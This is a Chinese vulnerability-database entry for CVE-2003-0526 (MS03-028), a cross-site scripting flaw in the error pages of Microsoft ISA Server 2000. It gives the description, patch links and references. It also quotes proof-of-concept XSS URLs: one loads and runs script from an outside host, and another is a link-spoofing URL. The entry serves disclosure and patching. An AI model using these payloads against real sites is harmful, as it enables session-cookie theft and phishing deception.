CVE-2003-0526
CVSS6.8
发布时间 :2003-08-18 00:00:00
修订时间 :2016-10-17 22:35:00
NMCOES    

[原文]Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found."


[CNNVD]Microsoft ISA服务器HTTP错误处理跨站脚本执行漏洞(MS03-028)(CNNVD-200308-071)

        
        Microsoft ISA服务器集成可扩展,多层企业级防火墙,可扩展高性能WEB缓冲服务程序。
        Microsoft ISA在错误页面在处理客户端消息时缺少充分过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击,可能窃取用户用于验证的敏感COOKIE信息。
        ISA服务器遇到HTTP错误代码如"404 Not Found"或者"500 Internal Server Error",ISA服务器就会返回HTML形式的错误处理信息,这些HTML文件使用脚本输出链接作为SERVER。TLD的部分URL。通过构建特殊形式的URL可能在HTTP错误处理页面中包含任意脚本命令,当用户访问这些包含恶意脚本的链接时,可导致用户基于验证的Cookie等敏感信息泄露。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:isa_server:2000:fp1Microsoft isa_server 2000 fp1
cpe:/a:microsoft:isa_server:2000:sp1Microsoft isa_server 2000 sp1
cpe:/a:microsoft:isa_server:2000Microsoft isa server 2000

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:117Microsoft ISA Server Cross-Site Scripting
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0526
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0526
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-071
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0029.html
(VENDOR_ADVISORY)  VULNWATCH  20030716 ISA Server - Error Page Cross Site Scripting
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0031.html
(UNKNOWN)  VULNWATCH  20030716 Microsoft ISA Server HTTP error handler XSS (TL#007)
http://marc.info/?l=bugtraq&m=105838519729525&w=2
(UNKNOWN)  BUGTRAQ  20030716 Microsoft ISA Server HTTP error handler XSS (TL#007)
http://marc.info/?l=bugtraq&m=105838862201266&w=2
(UNKNOWN)  BUGTRAQ  20030716 ISA Server - Error Page Cross Site Scripting
http://marc.info/?l=ntbugtraq&m=105838590030409&w=2
(UNKNOWN)  NTBUGTRAQ  20030716 Microsoft ISA Server HTTP error handler XSS (TL#007)
http://pivx.com/larholm/adv/TL006
(UNKNOWN)  MISC  http://pivx.com/larholm/adv/TL006
http://www.microsoft.com/technet/security/bulletin/ms03-028.asp
(UNKNOWN)  MS  MS03-028

- 漏洞信息

Microsoft ISA服务器HTTP错误处理跨站脚本执行漏洞(MS03-028)
中危 输入验证
2003-08-18 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft ISA服务器集成可扩展,多层企业级防火墙,可扩展高性能WEB缓冲服务程序。
        Microsoft ISA在错误页面在处理客户端消息时缺少充分过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击,可能窃取用户用于验证的敏感COOKIE信息。
        ISA服务器遇到HTTP错误代码如"404 Not Found"或者"500 Internal Server Error",ISA服务器就会返回HTML形式的错误处理信息,这些HTML文件使用脚本输出链接作为SERVER。TLD的部分URL。通过构建特殊形式的URL可能在HTTP错误处理页面中包含任意脚本命令,当用户访问这些包含恶意脚本的链接时,可导致用户基于验证的Cookie等敏感信息泄露。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-028)以及相应补丁:
        MS03-028:Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack (Q816456)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-028.asp

        补丁下载:
        Microsoft ISA Server english:
        
        http://download.microsoft.com/download/4/6/4/464c95cd-8488-410d-bacb-69b25eaa7822/ISA2000-KB816456-x86.exe

        Microsoft ISA Server French:
        
        http://download.microsoft.com/download/a/d/6/ad64a2af-d359-44e5-88d9-321269f1afde/ISA2000-KB816456-x86.exe

        Microsoft ISA Server German:
        
        http://download.microsoft.com/download/9/f/3/9f39d8a7-4897-43e5-bd90-70cc468139ae/ISA2000-KB816456-x86.exe

        Microsoft ISA Server Spanish:
        
        http://download.microsoft.com/download/5/a/a/5aabcffe-e89c-4275-b2ba-64c47e42f078/ISA2000-KB816456-x86.exe

        Microsoft ISA Server Japanese:
        
        http://download.microsoft.com/download/1/5/b/15b400a5-5b40-4721-92b0-caef3f190146/ISA2000-KB816456-x86.exe

- 漏洞信息 (22919)

Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities (EDBID:22919)
windows remote
2003-07-16 Verified
0 Brett Moore
N/A [点击下载]
source: http://www.securityfocus.com/bid/8207/info

ISA server will output certain error pages when requests that are invalid, for whatever reason, are transmitted through it. These error pages will appear in the context of the domain that the request was made for. It has been reported that many of these error pages contain cross-site scripting vulnerabilities that allow for the execution of script code (embedded in the request URI) in the context of client requested domains.

The following proof-of-concept was provided:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0

The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation.

*http://<iframe>:test@[site]/test

The exploit provided for BID 4486 will also reportedly work for this vulnerability.

An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination:
<A href="http://www.example.com%09%09%09@%09%09%09%09%09%09
09www.malware.com">http://www.example.com</A>		

- 漏洞信息

2298
Microsoft ISA Server Error Page XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

ISA Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the returned URI upon submission to the error page script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2003-07-16 2003-05-21
2003-07-16 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft ISA Server Cross-Site Scripting Vulnerabilities
Input Validation Error 8207
Yes No
2003-07-16 12:00:00 2009-07-11 10:56:00
Discovery credited to Brett Moore of Security-Assessment.com.

- 受影响的程序版本

Microsoft ISA Server 2000 SP1
+ Microsoft Small Business Server 2000 0
+ Microsoft Small Business Server 2003 Premium Edition
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft ISA Server 2000 FP1
Microsoft ISA Server 2000
+ Microsoft Small Business Server 2000 0
+ Microsoft Small Business Server 2003 Premium Edition
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server

- 漏洞讨论

ISA server will output certain error pages when requests that are invalid, for whatever reason, are transmitted through it. These error pages will appear in the context of the domain that the request was made for. It has been reported that many of these error pages contain cross-site scripting vulnerabilities that allow for the execution of script code (embedded in the request URI) in the context of client requested domains.

This vulnerability is reportedly similar to the one described in BID 4486.

- 漏洞利用

The following proof-of-concept was provided:
http://&lt;img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;"&gt;script@YOUR.TLD/%U0

The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation.

*http://&lt;iframe&gt;:test@[site]/test

The exploit provided for BID 4486 will also reportedly work for this vulnerability.

An additional proof-of-concept was supplied by "http-equiv@excite.com" &lt;1@malware.com&gt; that demonstrates a true status and a false destination:
&lt;A href="http://www.example.com%09%09%09@%09%09%09%09%09%09
09www.malware.com"&gt;http://www.example.com&lt;/A&gt;

- 解决方案

Microsoft has released a patch:


Microsoft ISA Server 2000 FP1

Microsoft ISA Server 2000 SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站